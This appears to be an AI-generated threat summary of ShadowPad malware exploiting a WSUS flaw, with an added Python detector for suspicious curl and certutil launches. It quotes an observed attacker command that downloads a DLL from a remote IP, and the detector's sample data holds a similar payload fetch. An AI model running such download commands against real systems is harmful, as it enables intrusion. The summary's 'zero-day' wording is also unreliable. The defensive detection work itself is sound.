ShadowPad Malware Exploits WSUS Vulnerability for System Access


These articles are AI-generated summaries. Please check the original sources for full details.

ShadowPad Malware Actively Exploits WSUS Vulnerability

The ShadowPad backdoor is being deployed through exploitation of CVE-2025-59287, a critical deserialization flaw in Microsoft’s Windows Server Update Services (WSUS). This allows attackers to gain full system access on affected servers, leveraging publicly available exploit code.

Why This Matters

Ideal security models assume prompt patching; however, many organizations struggle to maintain up-to-date systems due to complexity or resource constraints. The rapid weaponization of this WSUS vulnerability, just a month after patching, highlights the risk of zero-day exploits and the potential for widespread compromise, especially considering WSUS is a common component of enterprise infrastructure. The cost of a full system compromise can easily exceed six figures, factoring in remediation, downtime, and potential data breaches.

Key Insights

  • CVE-2025-59287: Critical deserialization flaw in WSUS patched November 2025.
  • ShadowPad/PlugX: A modular backdoor with roots dating back to 2015 commonly used by Chinese state-sponsored groups.
  • Living off the Land: Attackers leverage legitimate tools such as curl.exe and certutil.exe that are already present on target systems to download and execute malware.

Working Example

# Example of command used to download ShadowPad (observed in attack)
curl --proto '=https' --tlsv1.2 -sS https://149.28.78[.]189:42306/ETDApix.dll -o ETDApix.dll
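The observed command is a download tool launched from a WSUS host, so the detection angle is process-creation telemetry: a WSUS process should never spawn curl.exe or certutil.exe, and any command-line fetch of a DLL or EXE deserves a look. The following is an added example, not code from the article or any vendor; the parent process names (WsusService.exe, w3wp.exe) and the sample log records are assumptions constructed for illustration.

```python
import re
from pathlib import PureWindowsPath

# Download tools the summary names as living-off-the-land binaries.
LOLBIN_DOWNLOADERS = {"curl.exe", "certutil.exe"}
# Assumed WSUS-side parent processes (an assumption, not from the article): the WSUS
# Windows service and the IIS worker process that hosts the WSUS web application.
WSUS_PARENTS = {"wsusservice.exe", "w3wp.exe"}
URL_RE = re.compile(r"https?://[^\s'\"]+", re.IGNORECASE)

# Constructed sample process-creation records, 'ParentImage|Image|CommandLine'
# (Sysmon Event ID 1 reduced to three fields). Hosts and file names are made up.
SAMPLE_EVENTS = [
    "C:\\Program Files\\Update Services\\Service\\WsusService.exe|C:\\Windows\\System32\\curl.exe|"
    "curl --proto '=https' --tlsv1.2 -sS https://203.0.113.10:42306/payload.dll -o payload.dll",
    "C:\\Windows\\explorer.exe|C:\\Windows\\System32\\curl.exe|curl -sS https://example.com/notes.txt -o notes.txt",
    "C:\\Windows\\System32\\svchost.exe|C:\\Windows\\System32\\certutil.exe|certutil -hashfile C:\\tmp\\setup.exe SHA256",
    "C:\\Windows\\System32\\inetsrv\\w3wp.exe|C:\\Windows\\System32\\cmd.exe|cmd /c whoami",
]

def parse_event(line):
    """Split one 'ParentImage|Image|CommandLine' record into a dict."""
    parent, image, cmdline = line.split("|", 2)
    return {"parent": parent, "image": image, "cmdline": cmdline}

def classify(event):
    """Return a finding dict for a suspicious download-tool launch, else None."""
    image = PureWindowsPath(event["image"]).name.lower()
    parent = PureWindowsPath(event["parent"]).name.lower()
    if image not in LOLBIN_DOWNLOADERS:
        return None                      # other LOLBins are out of scope here
    match = URL_RE.search(event["cmdline"])
    url = match.group(0) if match else None
    if parent in WSUS_PARENTS:
        # A WSUS service process has no business launching curl or certutil at all.
        return {"severity": "high", "reason": f"{image} spawned by WSUS process {parent}",
                "url": url, "parent": parent}
    if url:
        # Any command-line fetch from a remote host is worth a look; escalate when the
        # fetched object is a DLL or EXE, as in the observed ShadowPad download.
        sev = "high" if url.lower().rsplit("/", 1)[-1].endswith((".dll", ".exe")) else "medium"
        return {"severity": sev, "reason": f"{image} downloaded {url}", "url": url, "parent": parent}
    return None                          # e.g. certutil -hashfile, no network fetch

def scan(lines):
    """Run classify() over raw records and keep only the findings."""
    findings = [classify(parse_event(line)) for line in lines]
    return [f for f in findings if f is not None]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f["severity"].upper(), f["reason"])
```

The first record is flagged high because of its parent alone, the second medium as a plain download, and the hash check and the cmd.exe launch produce no finding.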

Practical Applications

  • Use Case: Large enterprises utilizing WSUS for patch management are at elevated risk, requiring immediate patching and monitoring.
  • Pitfall: Relying solely on automated patching without verifying successful deployment and application can leave systems vulnerable despite “patching” being reported as complete.
